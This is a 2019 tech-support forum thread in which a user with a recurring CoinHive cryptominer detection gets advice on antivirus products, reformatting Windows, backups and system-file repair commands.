# HEUR.Trojan script miner gen malware



## andy_65_in (Oct 29, 2019)

Using KIS paid version...my laptop cant use any browser...when i open any browser i get this input that requested url cant be accesed as object is infected by abovenamed virus.. which it claims cant be disinfected...please help me...frustrated by this crap of KIS version...


----------



## bssunilreddy (Oct 29, 2019)

andy_65_in said:


> Using KIS paid version...my laptop cant use any browser...when i open any browser i get this input that requested url cant be accesed as object is infected by abovenamed virus.. which it claims cant be disinfected...please help me...frustrated by this crap of KIS version...


Format the system after taking back up or you can recover files after you format also.

Sent from my Nokia 8.1 using Tapatalk


----------



## Desmond (Oct 29, 2019)

>HEUR
It means that the URL was blocked because of heuristic scan by the AV. Heuristic means that it was blocked based on behaviour and not because of a virus definition. This means that this could be a false positive, but it's better to check before you dismiss it completely.

Could you take a HijackThis scan of your system and post the logs here?

Edit: Link - HiJackThis


----------



## andy_65_in (Oct 29, 2019)

Desmond i cant access any website from my infected pc....but i can access the net thru my mobile using the same router...infact im using the mobile to post this thread


----------



## meetdilip (Oct 29, 2019)

Did you try opening NDTV, Google etc ? If all are having the same issue, download Malwarebytes ( ask help from a friend ), install it on the infected PC and run  a scan.


----------



## whitestar_999 (Oct 30, 2019)

Still no harm in scanning the system with malwarebytes free just to be on safe side.


----------



## andy_65_in (Oct 30, 2019)

Ok...should i change the AV....from KIS to ??


----------



## Desmond (Oct 30, 2019)

I stopped using Kaspersky after they were compromised by the Russian government. Currently using Bitdefender but it runs really slow, won't renew it's subscription. ESET I think is the next best option.


----------



## meetdilip (Oct 30, 2019)

If it works for you and you are happy with it, no need to change. However, if you wish to, there are options like  Avast which works well.


----------



## andy_65_in (Oct 30, 2019)

whitestar_999 said:


> Still no harm in scanning the system with malwarebytes free just to be on safe side.


Scanned using malwarebytes...detected 83 threats!!!quarantined


----------



## whitestar_999 (Oct 30, 2019)

As expected,system itself was compromised.Format the C drive & reinstall windows,I am guessing system was infected before you installed kis(if browsers were not working since the day you installed kis). Also don't use/install win 7 now(if using) as its support is ending on 14th jan 2020. Upgrade to either win 8.1 or win 10 latest version & regularly update it.


----------



## andy_65_in (Oct 30, 2019)

I have original win 8 updated to 10 thru free update...kis was working fine since many months...windows 10 regularly updating...what should i do now...second scan with mal..bytes revealed 1 more threat,removed...then malbytes updated...rescan third time no threats...shud i throw out kis..its still interfering..getting the same threat...kis is only permitting surfing when in protection i disable web anti virus option...but then warning comes up of cmptr being insecure...kya karna hai,,,no poblem in surfing the net using my phone using the same net provider and same router


----------



## bssunilreddy (Oct 30, 2019)

ESET NOD32 Premium @ 1295 (1 PC - 1 Year)@ amazon.in
Check it because I could not provide the link via tapatalk

Sent from my Nokia 8.1 using Tapatalk


----------



## whitestar_999 (Oct 30, 2019)

Format & reinstall win 10,don't take any chances with a compromised pc. This time use avira free for first few months & if you like it then you can buy its pro version.Also keep all your browsers updated(prefer chrome & firefox with adblock extensions).


----------



## pkkumarcool (Oct 30, 2019)

Yes format the system completely reinstall windows dont take chances 


Sent from my iPhone using Tapatalk


----------



## pkkumarcool (Oct 30, 2019)

bssunilreddy said:


> Format the system after taking back up or you can recover files after you format also.
> 
> Sent from my Nokia 8.1 using Tapatalk



Can you link a guide for it?


Sent from my iPhone using Tapatalk


----------



## Desmond (Oct 30, 2019)

meetdilip said:


> Avast


Avast Online Security and Avast Secure Browser are spying on you



pkkumarcool said:


> Can you link a guide for it?
> 
> 
> Sent from my iPhone using Tapatalk


It's pretty easy to do.

Make a bootable windows USB using their media creator tool: Download Windows 10 . Use a clean machine to do this just to be safe.

Then, backup all your data and reboot using the bootable USB you created. After that just select your former C: partition and format it in the windows setup dialog box. Then install into the newly formatted partition.

You can find guides online to do this, or you can ask here if you want more detailed steps.


----------



## pkkumarcool (Oct 30, 2019)

What is the best antivirus then ? Also backup takes very long time if you copy to external hdd


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Oct 30, 2019)

Which free cloud to dump my photos etc before format


----------



## pkkumarcool (Oct 30, 2019)

andy_65_in said:


> Which free cloud to dump my photos etc before format



No free cloud try google drive for 1gb space


Sent from my iPhone using Tapatalk


----------



## whitestar_999 (Oct 30, 2019)

andy_65_in said:


> Which free cloud to dump my photos etc before format


gmail account 15gb free,make multiple accounts depending on how much space you need.


----------



## whitestar_999 (Oct 30, 2019)

pkkumarcool said:


> What is the best antivirus then ? Also backup takes very long time if you copy to external hdd


There is no "best antivirus",only good antivirus programs.Also if you do not follow good security policies(like not clicking on any link without any thought especially if received via email/popup/messenger, regularly updating antivirus/windows/browsers & not browsing shady sites/torrents(unless you already know what steps need to be taken while doing this) then no antivirus will help you.


----------



## meetdilip (Oct 30, 2019)

Formatting C drive only is a decade old trick. Viruses are now smart enough. They hide in other drives and come back after reinstall. Filter your data, take a backup, do a full wipe and reinstall Windows.


----------



## meetdilip (Oct 30, 2019)

Desmond David said:


> Avast Online Security and Avast Secure Browser are spying on you



What you say is true. I myself felt it. Not just browser, it reads the content of your documents, access webcam as a spy etc etc. Every antivirus is doing this, legally or otherwise. I decided to stick with Avast for the moment.


----------



## pkkumarcool (Oct 30, 2019)

whitestar_999 said:


> There is no "best antivirus",only good antivirus programs.Also if you do not follow good security policies(like not clicking on any link without any thought especially if received via email/popup/messenger, regularly updating antivirus/windows/browsers & not browsing shady sites/torrents(unless you already know what steps need to be taken while doing this) then no antivirus will help you.



I know the basic etiquette’s just want to know which antivirus to buy the forum can definitely decide.


Sent from my iPhone using Tapatalk


----------



## pkkumarcool (Oct 30, 2019)

I myself using avast.It is best in case what i heard regarding speed of pc.It doesn’t slow down pc much.


Sent from my iPhone using Tapatalk


----------



## whitestar_999 (Oct 31, 2019)

meetdilip said:


> Formatting C drive only is a decade old trick. Viruses are now smart enough. They hide in other drives and come back after reinstall. Filter your data, take a backup, do a full wipe and reinstall Windows.


No they don't unless it is a firmware/hardware virus & chances of getting infected by those for a typical user is almost zero.Simply formatting the C drive & then immediately installing a good AV after installing windows & its updates & before touching any other drive/installing any other software is enough.


----------



## whitestar_999 (Oct 31, 2019)

pkkumarcool said:


> I myself using avast.It is best in case what i heard regarding speed of pc.It doesn’t slow down pc much.
> 
> 
> Sent from my iPhone using Tapatalk


It all depends on your pc,there are people who say bitdefender/kis can make their i7 32gb ram ssd system crawl while others say it runs fine.Only way to be sure is by first using it for few weeks/month on your pc. Btw I prefer avira free over avast.


----------



## andy_65_in (Oct 31, 2019)

Transferring my data to google drive...really frustrsted with kaspersky....these chaps dont respond on so called tech supp tele....c drive badly infested as every scan  with malwarebytes freeversion shows viruses which i continue to quarantine...once data saved in cloud will undertake formatting...bye bye kis for me..bloody letdown


----------



## bssunilreddy (Oct 31, 2019)

andy_65_in said:


> Transferring my data to google drive...really frustrsted with kaspersky....these chaps dont respond on so called tech supp tele....c drive badly infested as every scan  with malwarebytes freeversion shows viruses which i continue to quarantine...once data saved in cloud will undertake formatting...bye bye kis for me..bloody letdown


Buy ESET NOD32 Premium 1PC 1Year edition from Amazon @ 1.25k

Link:ESET Smart Security Premium - 1 Device, 1 Year (CD) *www.amazon.in/dp/B0777GH1CX/ref=cm_sw_r_sms_apa_i_vgJUDbWJ3RDTX

Good AV uses less resources.

Sent from my Nokia 8.1 using Tapatalk


----------



## pkkumarcool (Oct 31, 2019)

bssunilreddy said:


> Buy ESET NOD32 Premium 1PC 1Year edition from Amazon @ 1.25k
> 
> Link:ESET Smart Security Premium - 1 Device, 1 Year (CD) *www.amazon.in/dp/B0777GH1CX/ref=cm_sw_r_sms_apa_i_vgJUDbWJ3RDTX
> 
> ...



why you recommending eset?


Sent from my iPhone using Tapatalk


----------



## bssunilreddy (Oct 31, 2019)

pkkumarcool said:


> why you recommending eset?
> 
> 
> Sent from my iPhone using Tapatalk


ESET NOD32 is good AV that's why.

Sent from my Nokia 8.1 using Tapatalk


----------



## whitestar_999 (Oct 31, 2019)

bssunilreddy said:


> Good AV uses less resources.


Bad AV also uses less resources.Don't give such false logic.


----------



## bssunilreddy (Oct 31, 2019)

whitestar_999 said:


> Bad AV also uses less resources.Don't give such false logic.


Yes it uses less resources
But Bit Defender is also good
Since OP wants a stand alone AV which detects his infected PC 
I suggested but if you know better then suggest

Sent from my Nokia 8.1 using Tapatalk


----------



## meetdilip (Oct 31, 2019)

andy_65_in said:


> as every scan with malwarebytes freeversion shows viruses which i continue to quarantine.



That is because the root of virus is not in the C drive. You delete from C drive, it will replace it. No matter how many times you delete /quarantine it.


----------



## cute.bandar (Oct 31, 2019)

Do full system Scans in safe mode. this is important. Otherwise there is full chance of the virus not getting deleted, even after getting detected / quarantined  

You don't need to do so much anti virus juggling. First scan with defender, then maybe with something else. You can go into "safe mode with networking" option, and then scan using online scanners. Online scanners are basically temporary on demand scanners. Only used them ages ago.

If the av don't work, before formatting try "windows built in reset functionality" , not as effective as full format, but it will stop the virus from running. They might still remain in the harddisk.

Also


----------



## whitestar_999 (Oct 31, 2019)

No point wasting time with such an infected pc,format the C drive & reinstall windows & install avira free(preferred) or bitdefender free & use it for few weeks.If you like it then buy the pro version.

P.S, after formatting the C drive & reinstalling windows,don't do anything else but just install antivirus first(aka no double clicking any other drive/file outside of C drive or installing other software).


----------



## bssunilreddy (Oct 31, 2019)

Best Windows 10 antivirus of 2019 | TechRadar


----------



## cute.bandar (Oct 31, 2019)

Actually "windows reset" reinstalls windows. Keeping personal files is optional. I would recommend doing that. 
What matters most is that the virus does not start when windows boots. Second thing that's really important is modification of system files. A virus that does that, is as good as running all the time. Don't know how many av check this. But it can and should be manually checked - *support.microsoft.com/en-in/help/9...er-tool-to-repair-missing-or-corrupted-system

In safe mode, open admin command prompt. Run following 2 commands.


> DISM.exe /Online /Cleanup-image /Restorehealth
> sfc /scannow



With a windows reinstall all those settings go back to default and the virus does not start at all.


----------



## whitestar_999 (Oct 31, 2019)

Not worth taking the chance,nowadays online security is very important unlike a few years ago.A system once infected can not be trusted especially if it is a primary system used for sensitive/financial tasks.Recommended solution is to format the C drive & start afresh.


----------



## SaiyanGoku (Oct 31, 2019)

^ Agreed. I would've taken a backup of non-executables using HBCD or Live linux usb and then re-installed windows using a drive which hasn't been plugged into the infected OS.


----------



## meetdilip (Oct 31, 2019)

SaiyanGoku said:


> using HBCD



Hiren's Boot CD ? Is it still around ?


----------



## SaiyanGoku (Oct 31, 2019)

meetdilip said:


> Hiren's Boot CD ? Is it still around ?


Yes, and x64 version is maintained by community/fans
Hiren's BootCD PE


----------



## meetdilip (Oct 31, 2019)

I see. Someone told me that it got abandoned some time ago.


----------



## whitestar_999 (Oct 31, 2019)

meetdilip said:


> I see. Someone told me that it got abandoned some time ago.


Sometimes the original developer abandons a project but community/fans keep it updated,you can say it is "officially abandoned" but not "practically abandoned".


----------



## pkkumarcool (Oct 31, 2019)

If i use live cd for backup from hdd to external hdd can i still get infected?


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Oct 31, 2019)

i have the OEM windows keys with me..after formatting...will i go back to the original win 8 or the later freely updated win 10


----------



## cute.bandar (Oct 31, 2019)

I did a bit of digging and it turns out.
- I stand corrected. The reset method isn't indeed 100% safe.. the Windows reset image itself can itself be infected by sophisticated virus. But many say that reset is safe for almost all cases.
- If you are concerned with the reset. Use Windows refresh. A fresh windows .wim image is downloaded, so equivalent to a format, only much much simpler. See here: *superuser.com/a/1151479 

Notes:
Many here are very trusting of antivirus. But its fairly easy to make virus undetectable with crypters, and packers.
See here Malware Crypters - the Deceptive First Layer - Malwarebytes Labs
The above is an analysis of a basic publically available for non-technical a**hole-malware-spreading-people . It even has a gui.
There are also crypter 'services' . upload virus -> get undetectable package.

Hiren's BootCD and similar tools are useful, but terrible from a security point of view! Lots of binaries from unknown sources, many propreitary


----------



## whitestar_999 (Oct 31, 2019)

pkkumarcool said:


> If i use live cd for backup from hdd to external hdd can i still get infected?
> 
> 
> Sent from my iPhone using Tapatalk


If you also copy infected files to external hdd & then run those files later then yes.



andy_65_in said:


> i have the OEM windows keys with me..after formatting...will i go back to the original win 8 or the later freely updated win 10


Win 10 activation remembers a system's hardware unique ID code that it generates during activation & this info is saved on MS activation servers.As long as hardware remains the same you need not enter any key & system will be automatically activated after going online.


----------



## whitestar_999 (Oct 31, 2019)

cute.bandar said:


> I did a bit of digging and it turns out.
> - I stand corrected. The reset method isn't indeed 100% safe.. the Windows reset image itself can itself be infected by sophisticated virus. But many say that reset is safe for almost all cases.
> - If you are concerned with the reset. Use Windows refresh. A fresh windows .wim image is downloaded, so equivalent to a format, only much much simpler. See here: *superuser.com/a/1151479
> 
> ...


Those crypters/packers can avoid old traditional signature based detection,not the latest ones like sandboxing/behaviour analysis etc.This is also why nowadays an av effectiveness depends a lot on internet connection as much processing is done online at AV company's end to analyse a file behaviour compared to relying on stored virus signatures in user pc. Tools like hiren boot cd are also customizable so one can make their own cd/dvd by using scripts(available on major tech forums) & own source programs.


----------



## andy_65_in (Oct 31, 2019)

In formatting...i keep my files or remove evrything...also remove my files or remove and clean  my drive ...which options to choose in my case


----------



## cute.bandar (Oct 31, 2019)

> not the latest ones like sandboxing/behaviour analysis etc.T


 I don't know the exact purpose of crypters. If they only change the signature then yeah they will be limited. But the heuristics game is a cat and mouse game. antivirus come with methods to detect, malware dev come with methods to bypass them.. there is no clear winner yet. Point is many new virus released are FUD - full undetectable . And 100,000 are released everyday.


> Tools like hiren boot cd are also customizable so one can make their own cd/dvd by using scripts(available on major tech forums) & own source programs.


Sure, if the software is obtained from open source trusted places. but most download random iso


----------



## whitestar_999 (Oct 31, 2019)

I agree it is a cat & mouse game but you have to be either very unlucky(in which case nothing will save you anyway) or very careless while being online(again nothing will save you in this case either) to encounter such "sophisticated malware". e.g.nowadays it only takes mere hours from the first appearance of such sophisticated malware to their detection added to cloud technology of av companies. Of course this is applicable only to typical home user & not corporate/institutions which need professional help if they really care about their security.


----------



## cute.bandar (Nov 1, 2019)

Not sure how difficult it is to make FUD malware. Some crypter services, whatever they do, they run them through virustotal like services, so several/many/most would be FUD. Also the criminals here are very organized.
Again not sure how long it takes such malware to be detected and added to the database. Considering the prevalance of ransomware it may not be that true me think. But if what you say is true, then windows defender should be the most capable av, and no other av should be required, since its present and enabled in almost every PC.

btw whitestar you sound very knowledgeable in this. I am curious about the source of your knowledge. Any pro experience?  NOT trying to diss. Just curious.
Mine is a long time curious nerd, all over the internet.


----------



## bssunilreddy (Nov 1, 2019)

NORTON ANTI-VIRUS CLASS ACTION
Toronto law firm Investigation Counsel Professional Corporation has launched a proposed class action against Symantec Corporation. Those affected are all Ontario residents who purchased Norton  branded security and antivirus software anytime  between July 2010 through July 2016.
This case arises out of recent news reports that, for at least seven years, there were critical vulnerabilities in a large number of Norton security and antivirus software products.  Not only did these longstanding and serious vulnerabilities make the protection and security features of  Norton antivirus software products less effective, they also allegedly made users of those products more susceptible to security breaches due to hacking, malware, and computer viruses. Investigation Counsel believes that Ontario residents who purchased these allegedly defective  Norton security and antivirus software products may be entitled to compensation.
If you purchased a Norton security or antivirus software product, please contact John Archibald at 416-637-3152 , by email at jarchibald@investigationcounsel.com or by filling out the form below.
Source:NORTON ANTI-VIRUS CLASS ACTION | Fraud Recovery Lawyers | Investigation Counsel PC

This is some of the things corporate firms do to remain in business.


----------



## pkkumarcool (Nov 1, 2019)

I would still recommend to take backup of other than c drive using live cd and then format everything.Dont take chances software viruses and malware have become smart.Also would like to say use a proper av windows defender is only good for people who are smart enough and dont click any stuff I personally use avast it gives me warning notification before openinf url whenever i click bad stuff.


Sent from my iPhone using Tapatalk


----------



## bssunilreddy (Nov 1, 2019)

pkkumarcool said:


> I would still recommend to take backup of other than c drive using live cd and then format everything.Dont take chances software viruses and malware have become smart.Also would like to say use a proper av windows defender is only good for people who are smart enough and dont click any stuff I personally use avast it gives me warning notification before openinf url whenever i click bad stuff.
> 
> 
> Sent from my iPhone using Tapatalk


Just format the PC and then recover C Drive using Easus Recovery software. After formatting any virus will disappear and then you can easily recover.


----------



## pkkumarcool (Nov 1, 2019)

bssunilreddy said:


> Just format the PC and then recover C Drive using Easus Recovery software. After formatting any virus will disappear and then you can easily recover.



I dont think Easus Recovery Software is free 


Sent from my iPhone using Tapatalk


----------



## bssunilreddy (Nov 1, 2019)

pkkumarcool said:


> I dont think Easus Recovery Software is free
> 
> 
> Sent from my iPhone using Tapatalk


Even with this a certain amount of storage can be recovered and one can buy it rather wasting time over what to do with an infected PC.


----------



## pkkumarcool (Nov 1, 2019)

bssunilreddy said:


> Even with this a certain amount of storage can be recovered and one can buy it rather wasting time over what to do with an infected PC.



Any free suggestions?


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 1, 2019)

If you take a backup, make sure it does not have malicious file in it. Because once you do a clean install and put them back, malware will also come back.


----------



## andy_65_in (Nov 1, 2019)

meetdilip said:


> If you take a backup, make sure it does not have malicious file in it. Because once you do a clean install and put them back, malware will also come back.


I have backed up in google drive...will this be a problem...also can i use a recovery software like easus in the same affected pc


----------



## whitestar_999 (Nov 1, 2019)

andy_65_in said:


> I have backed up in google drive...will this be a problem...also can i use a recovery software like easus in the same affected pc


If you backup up an infected file or recover an infected file then it will be an issue.Scan all backed up data & recovered data on another clean system before restoring it on original pc.

@pkkumarcool above also apply to you. @bssunilreddy recovering data does not differentiate between infected files & clean files,don't recommend it for infected systems.


----------



## whitestar_999 (Nov 1, 2019)

cute.bandar said:


> Not sure how difficult it is to make FUD malware. Some crypter services, whatever they do, they run them through virustotal like services, so several/many/most would be FUD. Also the criminals here are very organized.
> Again not sure how long it takes such malware to be detected and added to the database. Considering the prevalance of ransomware it may not be that true me think. But if what you say is true, then windows defender should be the most capable av, and no other av should be required, since its present and enabled in almost every PC.
> 
> btw whitestar you sound very knowledgeable in this. I am curious about the source of your knowledge. Any pro experience?  NOT trying to diss. Just curious.
> Mine is a long time curious nerd, all over the internet.


The prevalence of ransomware is mainly because of "user action" against which there are no solutions(what can you do if somebody decides to click & run a file despite warning) & the fact that most targets use old unpatched windows versions(wannacry exploited smb v1.0 vulnerability for which MS released patch in Apr 2017 & wannacry attack started in may 2017) which cannot be protected by simply using an av.

Windows defender is recently scoring 100% in av-comparatives tests which should tell you something.In fact there is a corporate version of windows defender which is much more advanced.
Microsoft Data Breach & Endpoint Security - Microsoft 365
Why Windows Defender Antivirus is the most deployed in the enterprise - Microsoft Security


> Approximately 96% of all malware is polymorphic – meaning that it is only experienced by a single user and device before it is replaced with yet another malware variant. *This is because in most cases malware is caught nearly as fast as it’s created, so malware creators continually evolve to try and stay ahead.* Data like this hammer home how important it is to have security solutions in place that are as agile and innovative as the attacks.



I just like to read,nothing else  you can spend some time at wilders forum,best starting point for gathering some good security related technical info(it also has probably the best backup & imaging related forum section with many experts).


----------



## meetdilip (Nov 1, 2019)

andy_65_in said:


> I have backed up in google drive...will this be a problem...also can i use a recovery software like easus in the same affected pc



Backup files that you trust, nothing else. I hope you know that virus can get into subfolders and hide in it, only to spread malware to the whole computer when they get a chance. Make sure you scan the backup data. 

But since you are using Google Drive, there is a good chance that no virus got through. Because Google has one of the most effective scans on their system.


----------



## andy_65_in (Nov 1, 2019)

whitestar_999 said:


> If you backup up an infected file or recover an infected file then it will be an issue.Scan all backed up data & recovered data on another clean system before restoring it on original pc.
> 
> @pkkumarcool above also apply to you. @bssunilreddy recovering data does not differentiate between infected files & clean files,don't recommend it for infected systems.


tell me ...simply..ive backed up my data in google drive...can i use this data again or not


----------



## andy_65_in (Nov 1, 2019)

trying formatting...after reset this pc commnad...igt choose an option.. i choose  remove evrything.but uske baad it takes me to --additional settings where i have to choose between current settings(just remove your files,quicker but less secure) or change settings which when i check leads me to another page where two options are shown in same row 1. data erasure_just remove your files..quicker but less ecure or data drives--remove all files from only drive where windiws installed..I havent understood all this ...much different from what is shown in hp.com....what shud i do


----------



## pkkumarcool (Nov 1, 2019)

andy_65_in said:


> tell me ...simply..ive backed up my data in google drive...can i use this data again or not



Dont trust google drive, scan your pc and look for affected files in virus chest dont backup those files then you’re safe.Btw how much data have you backed up?


Sent from my iPhone using Tapatalk


----------



## whitestar_999 (Nov 1, 2019)

andy_65_in said:


> tell me ...simply..ive backed up my data in google drive...can i use this data again or not


You can after downloading & scanning it with antivirus on same system after windows reinstall/different non-infected system.


----------



## andy_65_in (Nov 2, 2019)

pkkumarcool said:


> Dont trust google drive, scan your pc and look for affected files in virus chest dont backup those files then you’re safe.Btw how much data have you backed up?
> 
> 
> Sent from my iPhone using Tapatalk


 ive backed up my photos and some files in google drive


----------



## pkkumarcool (Nov 2, 2019)

andy_65_in said:


> ive backed up my photos and some files in google drive



Have you scanned your pc with antivirus and checked if photos or other files are infected or not?


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 2, 2019)

While attempting google chrome download after format of my pc...i got a redemtion incomplete warning on win defender..i stopped the dowload...scan by both win defender and malwarebytes showed no threats..but when i check protection history...i see..remediation incomplete with threat shown as trojan.js/coinhive...alert severe...affected item is/was c drive.....chrome installer...i am bloody confused...using right now in newly formatted laptop only defender and malwarebytes


----------



## pkkumarcool (Nov 2, 2019)

andy_65_in said:


> While attempting google chrome download after format of my pc...i got a redemtion incomplete warning on win defender..i stopped the dowload...scan by both win defender and malwarebytes showed no threats..but when i check protection history...i see..remediation incomplete with threat shown as trojan.js/coinhive...alert severe...affected item is/was c drive.....chrome installer...i am bloody confused...using right now in newly formatted laptop only defender and malwarebytes



Defender and malwarebytes isnt enough check with all software below
The first one is the most important one.

1.Antivirus
2.Adwcleaner. 3.Malwarebytes. 4.rKill 5.RogueKiller.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 2, 2019)

pkkumarcool said:


> Defender and malwarebytes isnt enough check with all software below
> The first one is the most important one.
> 
> 1.Antivirus
> ...


What are these...i couldnt understand


----------



## pkkumarcool (Nov 2, 2019)

andy_65_in said:


> What are these...i couldnt understand



these are malware,trojan removal softwares as important as antivirus 


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 2, 2019)

andy_65_in said:


> .affected item is/was c drive.....chrome installer..



Possible cases

1. False-positive, which program flagged it ?

2. Some virus renamed and changed itself as Chrome installer

But that is very rare if you are using a clean HDD.


----------



## andy_65_in (Nov 2, 2019)

meetdilip said:


> Possible cases
> 
> 1. False-positive, which program flagged it ?
> 
> ...


Full scan using defender shows no threat...could be a false input


----------



## whitestar_999 (Nov 2, 2019)

Post screenshots of warnings here along with files giving warnings.Also install avira free just for now & update it to scan whole pc.you can remove it afterwards if no threats found.


----------



## meetdilip (Nov 2, 2019)

Normally a scan using Malwarebytes is enough. There are other tools like AdwCleaner which can be helpful as well. Coin hive, if I understand correctly, is a crypto currency miner. You will need an antivirus with a module to detect such miners to fix that.


----------



## andy_65_in (Nov 2, 2019)

meetdilip said:


> Normally a scan using Malwarebytes is enough. There are other tools like AdwCleaner which can be helpful as well. Coin hive, if I understand correctly, is a crypto currency miner. You will need an antivirus with a module to detect such miners to fix that.


Any free type of this av


----------



## andy_65_in (Nov 2, 2019)

whitestar_999 said:


> Post screenshots of warnings here along with files giving warnings.Also install avira free just for now & update it to scan whole pc.you can remove it afterwards if no threats found.


----------



## andy_65_in (Nov 2, 2019)

whitestar_999 said:


> Post screenshots of warnings here along with files giving warnings.Also install avira free just for now & update it to scan whole pc.you can remove it afterwards if no threats found.


Cant post screenshot...but i get this...remediation incomplete..threat trojan js counhive..affected items...a long file in c drive..ruffly called c/users/app data/locsl/temp...but when i scan using malwarebytes and zamana..no threat


----------



## andy_65_in (Nov 2, 2019)

Scanned now using avira free...all clear...im now going mad....what should i do...format this laptop again...and sell the dam thing


----------



## meetdilip (Nov 2, 2019)

andy_65_in said:


> Any free type of this av



Looks like Malwarebytes has some expertise in it

Cryptojacking definition – What is it, and how can you prevent it?

I have seen those only in paid modules. All I can say now is scan your data with your AV and Malwarebytes and then use your system until there is some malware warning. Most people like us do not have anything precious on our PC to steal.


----------



## whitestar_999 (Nov 2, 2019)

andy_65_in said:


> Cant post screenshot...but i get this...remediation incomplete..threat trojan js counhive..affected items...a long file in c drive..ruffly called c/users/app data/locsl/temp...but when i scan using malwarebytes and zamana..no threat





andy_65_in said:


> Scanned now using avira free...all clear...im now going mad....what should i do...format this laptop again...and sell the dam thing


It seems like a temporary internet webpage file created(& probably active only) inside a browser while being connected to net.If system is not connected to net then it should show no threat.Also this file can be created by simply vising some affected website.Delete everything inside the temp folder where this file is located then connect to net & browse some sites you usually visit using the browsers you generally use while letting avira free run in background.If you get no warning then everything is fine.Next time onwards,whenever you visit a site infected with such malware then avira will block it giving you a similar warning "coinhive.js.. detected & quarantined".


----------



## andy_65_in (Nov 2, 2019)

whitestar_999 said:


> It seems like a temporary internet webpage file created(& probably active only) inside a browser while being connected to net.If system is not connected to net then it should show no threat.Also this file can be created by simply vising some affected website.Delete everything inside the temp folder where this file is located then connect to net & browse some sites you usually visit using the browsers you generally use while letting avira free run in background.If you get no warning then everything is fine.Next time onwards,whenever you visit a site infected with such malware then avira will block it giving you a similar warning "coinhive.js.. detected & quarantined".


did what you said...surfing is normal..no warnings..including while installing google chrome finally...so so ar looks good...am running avira,malwarebytes and zemana all free versions and all are CLEAR so far...fingers crossed for some time...wondering net banking use karen or not..or wait for day...in the meanwhile updating windows


----------



## whitestar_999 (Nov 2, 2019)

Which windows version are you using btw(win 8.1/win 10 home/win 10 pro etc)? Wait for windows to update first.


----------



## andy_65_in (Nov 2, 2019)

whitestar_999 said:


> Which windows version are you using btw(win 8.1/win 10 home/win 10 pro etc)? Wait for windows to update first.


Win 10..64 bit.  Home


----------



## andy_65_in (Nov 3, 2019)

Getting pua crypotiminer gen alerts in my avira free every minute as i use mozilla(i removed chrome)...this crap then goes into quarantine where i delete it..is this mslware...btw scans by hitmanpro,zemana,malwarebytes,window defender show no threats....what should i do...stick to IEonly


----------



## pkkumarcool (Nov 3, 2019)

andy_65_in said:


> Getting pua crypotiminer gen alerts in my avira free every minute as i use mozilla(i removed chrome)...this crap then goes into quarantine where i delete it..is this mslware...btw scans by hitmanpro,zemana,malwarebytes,window defender show no threats....what should i do...stick to IEonly



Have you fresh installed windows?


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 3, 2019)

pkkumarcool said:


> Have you fresh installed windows?
> 
> 
> Sent from my iPhone using Tapatalk


Yes


----------



## pkkumarcool (Nov 3, 2019)

andy_65_in said:


> Yes



How you got virus again then?


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 3, 2019)

Getting repeated attacks every minute while browsing...


----------



## andy_65_in (Nov 3, 2019)

Bhai avira ko remove kardoon....for peace of mind...lol


----------



## pkkumarcool (Nov 3, 2019)

andy_65_in said:


> Bhai avira ko remove kardoon....for peace of mind...lol



Use avast 


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 3, 2019)

Trojan coin hive is back....as per win defender....dont dont what the hell is wroong with my machine...best is to reformat it again and sell it...its already 7 years old


----------



## andy_65_in (Nov 3, 2019)

Trojan hive also confirmed by newly added avast...wiill reformat and try selling this pc...im im surprised the hdd looks compromised even after reformat....avast prompts to buy paid version


----------



## meetdilip (Nov 3, 2019)

Did you use an existing installer of Chrome or Firefox? That could be the compromised part.

Do a clean wipe of HDD, download the latest Windows 10 ISO and do an install. Then download all installer new, no matter Chrome, Firefox, MS Office etc,

I know this is a lot of work. But I don't see any other way of being certain.


----------



## whitestar_999 (Nov 3, 2019)

Seems like you are installing something infected(I hope you are not using firefox/chrome setup files from earlier/backup instead of fresh downloading again from their official sites).


----------



## meetdilip (Nov 3, 2019)

Another possibility is that it is coming from your network. It can come even from an infected phone if not an infected PC.


----------



## whitestar_999 (Nov 3, 2019)

meetdilip said:


> Another possibility is that it is coming from your network. It can come even from an infected phone if not an infected PC.


That is only possible if network is properly setup & write permission given to shared folders.


----------



## andy_65_in (Nov 3, 2019)

Firefix etc downloaded fresh....no old files....avast now not permitting to access every site....


----------



## andy_65_in (Nov 3, 2019)

Avast free removed 2 viruses trojanntypes...i am using oem website for browsers download....avast paid availible for 700.00 wondering using it...even got a vpn secure on trial from avast..which as per them shows my location in hongkong!!will strengthening the wi fi password matter...at 700 avast for 1pc1 yr is ok


----------



## whitestar_999 (Nov 3, 2019)

oem website? you mean these: Download the fastest Firefox ever  Google Chrome Web Browser


----------



## pkkumarcool (Nov 3, 2019)

andy_65_in said:


> Avast free removed 2 viruses trojanntypes...i am using oem website for browsers download....avast paid availible for 700.00 wondering using it...even got a vpn secure on trial from avast..which as per them shows my location in hongkong!!will strengthening the wi fi password matter...at 700 avast for 1pc1 yr is ok



So are you still getting pop ups?



Sent from my iPad using Tapatalk


----------



## meetdilip (Nov 3, 2019)

Avast has a boot time scan option. Give it a try.


----------



## andy_65_in (Nov 3, 2019)

Js.miner-av is the virus blocked by avast free walla..but its screwing my happiness..i cant access most sites now...used roguekill also...that crap showed no virus...lol...dont know what to do....should i reformat this lappie again...pl advice


----------



## andy_65_in (Nov 4, 2019)

Even ran full scan of defender and ms malware removal tool...no threats...but when i surf..avast starts fingering with js miner threat


----------



## whitestar_999 (Nov 4, 2019)

andy_65_in said:


> Even ran full scan of defender and ms malware removal tool...no threats...but when i surf..avast starts fingering with js miner threat


Can you post a screenshot of the web page when you get the warning? Also can you check with different connection(some mobile 3g/4g connection hotspot).


----------



## andy_65_in (Nov 4, 2019)

Cant upload...using mobile...heres what get...THREAT BLOCKED..we safely aborted connection on ncc.avast.com because it was infected with JS miner AV(Tr)...etcetc

Will check 4 g tomorow as it doesnt wk here...but im using my mobile on same network...no probs


----------



## andy_65_in (Nov 4, 2019)

The same chu....yapa has started as was with kaspersky....every website being bloked

Please advice...if i again format this crap machine...how should i start uske baad...that can be my last try...otherwise i trash this crap


----------



## whitestar_999 (Nov 4, 2019)

